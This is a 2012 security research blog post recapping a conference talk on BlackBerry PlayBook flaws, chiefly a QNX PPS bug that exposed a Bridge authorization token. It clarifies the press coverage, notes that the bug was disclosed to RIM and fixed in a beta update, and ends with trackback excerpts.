Intrepidus Group
Insight

“Voight-Kampff’ing The BlackBerry PlayBook” at INFILTRATE 2012

Posted: January 16, 2012 – 11:43 am | Author: and | Filed under: bugs, Conferences, Mobile Security | Tags: , , ,

Last week, we gave a talk at Immunity’s awesome INFILTRATE conference in Miami Beach, FL. Our presentation, “Voight-Kampff’ing The BlackBerry PlayBook”, discussed some of the black-box style, independent research we performed on the BlackBerry PlayBook. Although some content was similar to our PlayBook talk at SecTor 2011, there were some very notable additions. In particular, we discussed reverse engineering of PlayBook firmware images; flaws in authorization of AppWorld downloads; and exposure of an authorization token used for BlackBerry Bridge (the PlayBook’s PIM and email sync component).

The lattermost point has stirred up a bit of press post-INFILTRATE, so we’d like to clarify a few things:

1. The exposure of the authorization token is facilitated by a bug in the Persistent Publish/Subscribe (PPS) facility of the QNX operating system. This bug causes the contents of otherwise-inaccessible files to be readable from a special file in the same directory. RIM was made aware of this PPS bug as a result of our SecTor talk, as well as notification from others, and again by us prior to INFILTRATE (with special emphasis on disclosure of the Bridge token) — they have fixed this PPS bug in Tablet OS 2.0 (beta).

2. This token exposure effectively renders the BlackBerry handset password moot. The exposed authorization token is accessible after the user has “unlocked” BlackBerry Bridge (where “unlocking” would entail entering the paired BlackBerry device’s password if one is set). Unlocking Bridge is an expected behavior/process for Bridge users. After all, if you’re using Bridge on your device, you’re going to do this. In the case where a BB handset password has not been set, a malicious actor could just request this token from the Bridge service directly.

3. This isn’t “sniffing”. Some highly misinformed comments on news articles have suggested things like “a bad guy would have to be within 10 meters to exploit this.” This issue is not, I repeat not related to Bluetooth (which is used by BlackBerry Bridge). As an aside, despite the title of the article, threatpost has one of the best (press) write-ups so far.

4. The pervasiveness of malicious mobile applications exacerbates this flaw. Unless you’ve been living under a rock, you know that even “savvy” users are frequently duped by seemingly legitimate applications which later turn out to be doing Bad Things. The downplaying of this as an attack vector is nonsense, and the “if dumb users install malicious apps, they deserve whatever’s coming to them” argument is silly. Note that client-side browser or document reader vulnerability could even render this vector moot in the end.

In upcoming posts, we’ll dive a bit deeper into the meat of our research, so stay tuned. For those interested, we have posted the slides at SlideShare, and uploaded some initial code to the Intrepidus Group GitHub page.

Both comments and trackbacks are currently closed.

5 Trackbacks

  1. By BlackBerry PlayBook Lets Hackers View Your Email on January 18, 2012 at 6:09 am

    [...] Lanier and Ben Nell of Intrepidus Group were a ones who found the Bridge‘s diseased spot. They enclosed it in their Blade [...]

  2. [...] Lanier and Ben Nell of Intrepidus Group were the ones who found the Bridge’s weak spot. They included it in their Blade Runner-themed [...]

  3. [...] Lanier and Ben Nell of Intrepidus Group were the ones who found the Bridge’s weak spot. They included it in their Blade Runner-themed [...]

  4. [...] it hits RIM on its biggest strength compared to other devices: security.Zach Lanier and Ben Nell of Intrepidus Group were the ones who found the Bridge’s weak spot. They included it in their Blade Runner-themed [...]

  5. [...] Lanier and Ben Nell of Intrepidus Group were the ones who found the Bridge’s weak spot. They included it in their Blade Runner-themed [...]

image

This site is protected with Urban Giraffe's plugin 'HTML Purified' and Edward Z. Yang's Powered by HTML Purifier. 24393 items have been purified.